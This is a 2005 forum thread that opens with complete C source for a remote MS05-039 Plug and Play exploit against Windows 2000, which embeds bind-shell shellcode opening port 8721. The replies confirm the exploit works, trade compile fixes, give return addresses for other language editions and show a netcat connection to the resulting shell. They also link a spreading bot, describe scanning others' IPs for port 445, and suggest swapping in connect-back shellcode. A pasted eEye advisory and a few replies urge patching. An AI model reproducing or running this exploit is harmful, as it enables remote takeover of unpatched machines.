Articles
|
|
pita
Aug 12 2005, 08:33 AM
CODE
/*
Windows 2000 universal exploit for MS05-039
-\x6d\x35\x6c\x30\x6e\x6e\x79-
*/
#include <windows.h>
#include <winnetwk.h>
#include <winsock.h>
#include <Rpc.h>
#include <wchar.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
BYTE Data1[0x68] =
{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,
0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00,
0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
struct DataStruct1
{
BYTE SomeString[0x30];
DWORD RESDataType;
DWORD LFD;
DWORD SDM1;
DWORD SDO;
DWORD SDL;
DWORD SDM2;
BYTE SDA[0x07D0];
DWORD LRD;
DWORD MB;
DWORD DM;
};
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
//from metasploit, before you were born
BYTE
BindShell[374]={
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
"\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
"\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
"\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
"\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
"\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
"\x04\x31\xdb\x53\xff\xd0"};
BYTE PRPC[0x48] =
{0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00
,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE POP[0x27] =
{0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00
,
0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00,
0x05,0x08,0x00,0x00,0x41,0x00,0x41};
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer) {
BYTE rbuf[0x1000];
DWORD dw;
struct RPCBIND RPCBind;
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString(Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,
sizeof(rbuf), &dw, NULL);
return 0;
}
int Attack(HANDLE PipeHandle)
{
struct RPCFUNC RPCOP;
int bwritten=0;
BYTE *LargeBuffer;
BYTE rbuf[0x100];
DWORD dw;
struct DataStruct1 EvilRPC;
memcpy(&EvilRPC,&Data1,sizeof(EvilRPC));
EvilRPC.SDL=0x07C0;
memset(EvilRPC.SDA,0x90,0x07D0);
EvilRPC.SDA[76]=0x3e;
EvilRPC.SDA[77]=0x1e;
EvilRPC.SDA[78]=0x02;
EvilRPC.SDA[79]=0x75;
memset(EvilRPC.SDA+80,0x90,10);
EvilRPC.SDA[90]=0x90;
memcpy(EvilRPC.SDA+94,BindShell,374);
EvilRPC.MB=0x00000004;
EvilRPC.DM=0x00000000;
EvilRPC.LFD=0x000007E0;
EvilRPC.LRD=0x000007E0;
memcpy(&RPCOP,&POP,sizeof(RPCOP));
RPCOP.Opnum = 54;
RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC);
RPCOP.AllocHint=sizeof(EvilRPC);
LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC));
memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC));
memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP));
memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC));
printf("Sending payload...\nThis has to time out... ctrl+c after 5 secs\ncheck for shell on port 8721");
TransactNamedPipe(PipeHandle, LargeBuffer,
sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL);
free(LargeBuffer);
return 0;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
if (argc < 2)
{
printf("Usage: 0539.exe <host>\n");
return 1;
}
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
WNetAddConnection2(&nr, "", "", 0);
_snprintf(szPipe, sizeof(szPipe),
"\\\\%s\\pipe\\browser",server);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);
BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0");
//SendMalformed RPC request
Attack(hFile);
return 0;
}
arn0ld
Aug 12 2005, 11:53 AM
i get a few errors when compiling it...
whisker
Aug 12 2005, 11:57 AM
compiled fine here...using ms visual c++ version 6..
Exploit worked
crackie
Aug 12 2005, 12:08 PM
whisker: did you used some special edited .h files? cause i got some errors about too long string... maybe
:info: compiling with dev-c++ 4.9.9.2 (win32)
whisker
Aug 12 2005, 12:12 PM
QUOTE(crackie @ Aug 12 2005, 12:08 PM) whisker: did you used some special edited .h files? cause i got some errors about too long string... maybe :info: compiling with dev-c++ 4.9.9.2 (win32) Nope..I do have dev c++ 4.9.9.2..tried to compiled using dev c++ and I've got error, but using visual c++ worked very well no added any special h files.
apsync
Aug 12 2005, 12:17 PM
brOmstar
Aug 12 2005, 12:22 PM
Compiles without a problem on dev-cpp for me...just add the both libs
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
andydis
Aug 12 2005, 01:03 PM
tested and working 100% good job, heres what eeye says August 11, 2005 Alert: Exploits for Plug and Play Vulnerability Released eEye Digital Security is alerting administrators to the existence of exploit code for the recently added Plug and Play Service vulnerability, which Microsoft patched this week as part of the August Security Update (security bulletin MS05-039). Specific information on this particular vulnerability can be found towards the end of this announcement. As a service to the network security community eEye has released a scanning utility, free of charge, which will identify vulnerable systems and provide remediation instructions. This tool can be downloaded immediately at: http://www.eeye.com/html/resources/downloa...dits/index.html About the Exploit Today, several instances of exploit code targeting the vulnerability discussed in MS05-039 were released to the world. The eEye Research Team, upon discovering two instances of exploit code online, conducted thorough testing to confirm that both present a legitimate threat to Windows 2000 systems (completely patched SP 4 with all hotfixes). One exploit, released by an anonymous author, will bind a command prompt to TCP port 8721. eEye reiterates our original position that users should consider this patch highly critical, and that it should be installed as soon as possible. For networks with multiple versions of Windows operating systems, eEye recommends allocating resources to remediate systems in this order: Windows 2000 (All Service Packs) Windows NT Windows XP Windows 2003 As a refresher, the vulnerability is an unchecked buffer in the Plug and Play service that can be exploited as a privilege escalation or to run remote code as SYSTEM. Users running Windows 2000 are vulnerable to a potential worm attack that would take advantage of this flaw. The Microsoft patch updates the Plug and Play service code to validate the length of a message before it passes it to the allocated buffer. MS05-039 Vulnerability in Plug and Play Could Allow Remote code Execution and Elevation of Privilege (899588) Microsoft Severity Rating: Critical http://www.microsoft.com/technet/security/...n/MS05-039.mspx Retina® UMPNP Scanner The Retina UMPNP Scanner is a single audit scanning tool offered free of charge by eEye Digital Security. This tool will scan network devices to determine if any are vulnerable to the Microsoft Plug and Play Service vulnerability (MS05-039). http://www.eeye.com/html/resources/downloa...dits/index.html
rush
Aug 12 2005, 01:32 PM
QUOTE(apsync @ Aug 12 2005, 12:17 PM) This will crash the windows machine, which will automaticly reboot in 60seconds. No shell or whatsoever.
illwill
Aug 12 2005, 02:41 PM
pita
Aug 12 2005, 02:44 PM
this exploit is working on windows 2k us, for those who are not from the usa
and want to test for there language, search for pop reg, pop reg, ret in umpnpmgr.dll.
like for me in win 2k server sp4 french:
pop reg, pop reg, ret in umpnpmgr.dll 0x767438f6
so u need to remplace
EvilRPC.SDA[76]=0x3e;
EvilRPC.SDA[77]=0x1e;
EvilRPC.SDA[78]=0x02;
EvilRPC.SDA[79]=0x75;
with
EvilRPC.SDA[76]=0xf6;
EvilRPC.SDA[77]=0x38;
EvilRPC.SDA[78]=0x74;
EvilRPC.SDA[79]=0x76;
To search for your language juste use findjmp2 or sac.
( sac.exe -r XPRET -d umpnpmgr.dll )
dw-chow
Aug 12 2005, 03:47 PM
Has anyone tried testing this against a computer with UPnP turned off on those specific platforms?
leckmund
Aug 12 2005, 03:51 PM
here the scanner for it.
hxxp://www.eEye.com/html/resources/downloads/download.asp?file=RetinaUMPNP&id=050812.072006.593224
Dater_
Aug 12 2005, 03:57 PM
Scanned by Retina UMPNP. Found vulnerable IP. ======= Exploit ================ D:\xploit\win2k_pnp 192.168.00.4* Sending payload... This has to time out... ctrl+c after 5 secs check for shell on port 8721 ============================ ======= NetCat ================ D:\tools\nc 192.168.00.4* 8721 D:\tools\ ============================ * - example I use IllWill (universal?) exploit... 
Axl
Aug 12 2005, 04:02 PM
exploit works fine,too good if you ask me :\
yet another masshacking skiddie hole...
ch0pper
Aug 12 2005, 04:03 PM
Retina UMPNP only does 16 ips at time !!!! but only could get it working with 1 ip at a time!!! any help with this
the exploit works fine ! i checked it with vmware 5 got a shell first time!!!
remote code execution and local elevation of privilege
vulnerability exists in Plug and Play that could allow an
attacker who successfully exploited this vulnerability to take
complete control of the affected system.
This is a remote code execution and local privilege elevation
vulnerability. On Windows 2000, an anonymous attacker could
remotely try to exploit this vulnerability.
On Windows XP Service Pack 1, only an authenticated user could
remotely try to exploit this vulnerability.
On Window XP Service Pack 2 and Windows Server 2003, only an
administrator can remotely access the affected component.
Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
this is strictly a local privilege elevation vulnerability.
An anonymous user cannot remotely attempt to exploit this
vulnerability on Windows XP Service Pack 2 and Windows
Server 2003.
MilchKuh
Aug 12 2005, 05:28 PM
Is it right that the port for this service is 445 ? so if it is, wouldn't it work to close only this port with the firewall?
BuzzDee
Aug 12 2005, 05:33 PM
...wouldn't it work to install the update? 
MilchKuh
Aug 12 2005, 05:35 PM
I think for security issuse it would be better for closing this port first.than install the updates so that nobody can attack you during the update time. only a idea...a awnser to my question would be nice 
BuzzDee
Aug 12 2005, 06:15 PM
usually port 445 is already blocked by the isp. but if it is open to the outside it is of course very important to block 445 to foreign ips... this will solve the prob of course. but patching your system is certainly necessary... ^^
asher
Aug 12 2005, 06:33 PM
what about port 5000?
assom
Aug 12 2005, 06:54 PM
If i am not mistaken this is the exploit for the "plug and play" and not the "Universal plug and play".
tested working on W2K machines with UPNP disabled , but the plug and play is by default on EVERYWHERE!!!!
MilchKuh
Aug 12 2005, 06:57 PM
yes ur right its for PNP , the name oft the exploit is simliar to the upnp service
bli4
Aug 12 2005, 08:08 PM
compiling with no error, exploit work fine  .
LittleHacker
Aug 12 2005, 08:50 PM
Universal version a minut ago published
soundsearch
Aug 12 2005, 09:07 PM
and what is the difference between the universal and the other .  
apoc_neo
Aug 12 2005, 09:09 PM
QUOTE(soundsearch @ Aug 12 2005, 09:07 PM) and what is the difference between the universal and the other . universal exploits 2000, xp sp1 and sp2, windows 2003 and sp1 also it is fixed so you do get a shell
jos40
Aug 12 2005, 09:36 PM
universal compiled version universal compiled
apoc_neo
Aug 12 2005, 09:37 PM
my god... so many skiddies are going to take this and mess shit up, better patch your systems now
apoc_neo
Aug 12 2005, 09:59 PM
oh here is an update, i have found a spreading bot for this exploit  i'll post it in a bit if you are interested in checking it out. looks interesting edit: here is the link... enjoy http://www.governmentsecurity.org/forum/in...showtopic=16030
Skadi
Aug 12 2005, 11:56 PM
I have tested all 2 Exploits but it don't work on my System . I have Win Xp Sp 2 but i haven't become a shell ://
apoc_neo
Aug 13 2005, 12:23 AM
QUOTE(Skadi @ Aug 12 2005, 11:56 PM) I have tested all 2 Exploits but it don't work on my System . I have Win Xp Sp 2 but i haven't become a shell :// yea, doesn't work on my xp sp2... but work on my windows 2000
XT18
Aug 13 2005, 12:24 AM
hey thanks this exploits works very good but didint work my computer either i just port scanned ips for 445 and it seemd to work on couple of the ips.
Pir
Aug 13 2005, 12:51 AM
same for me. Got shell on my win 2000 box... No shell on my WinXP or Win2k3: Sending payload... This has to time out... ctrl+c after 5 secs check for shell on port 8721 [*] connecting to 192.168.0.3:445...ok [*] null session...ok [*] bind pipe... [-] failed Both exploit tested. I think skiddies will give up after some attempts. // lol, i know is only for 2k! just tested on xp/2k3 to check
illwill
Aug 13 2005, 12:58 AM
because its for win2000 only you idiots it wont work on winxp or 2k3 because u need to establish a session as a current user from that system .. LEARN TO READ SHIT 
Skadi
Aug 13 2005, 01:06 AM
Yes . I have also after 445 scanned, but, everywhere was port 445 closed .Is the Port 445 blocked?? Sorry for my bad English :- / // Thank you Iwill for this Info *g*
Thom
Aug 13 2005, 01:09 AM
the universal one should work on languages else then english, right?
toe
Aug 13 2005, 01:31 AM
works on default install of win2k pro english.
-toe
MilchKuh
Aug 13 2005, 01:31 AM
i tested the 2 exploits...with the new universal i dont got a shell on my test system with the other one i did...do someone know why ?
apoc_neo
Aug 13 2005, 01:31 AM
QUOTE(Skadi @ Aug 13 2005, 01:06 AM) Yes . I have also after 445 scanned, but, everywhere was port 445 closed .Is the Port 445 blocked?? Sorry for my bad English :- / // Thank you Iwill for this Info *g* yes 445 is blocked because of old exploits like lsass and worms and firewalls also block this port on default and so do some isps.
apoc_neo
Aug 13 2005, 03:15 AM
kooops
Aug 13 2005, 03:22 AM
For me, it's makes rebooting the machine and no shell or mabye a router of fw is blocking me?!? However thanx a lot for sharing this 
MilchKuh
Aug 13 2005, 04:25 AM
i think the MS05-039 exploit works better than the HOD-ms05039...cause with first one i could exploit very more mashines....could someone explain why ?
rpm
Aug 13 2005, 11:02 AM
All is not lost, we've still got another exploit to look forward to Printer Spooler Service http://www.frsirt.com/english/advisories/2005/1357
majestic
Aug 13 2005, 11:54 AM
Exploit works fine..
There's no UPNP exploit that use connect-back method?
haz
Aug 13 2005, 12:01 PM
it should be very easy to replace the shellcode with a connect back shell
majestic
Aug 13 2005, 01:26 PM
Is there any way to secure a computer remotely?
haz
Aug 13 2005, 01:30 PM
apply the patch ?!
Mafo
Aug 13 2005, 02:02 PM
QUOTE(majestic @ Aug 13 2005, 09:26 AM) Is there any way to secure a computer remotely? go to MS site and get the appropriate patch for the computer (ie windows 2000 service pack 4) and if you're using flashfxp site exec it
illwill
Aug 13 2005, 04:21 PM
connectback shell is easy
just go to metasploit and generate the shellcode and insert it
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
|
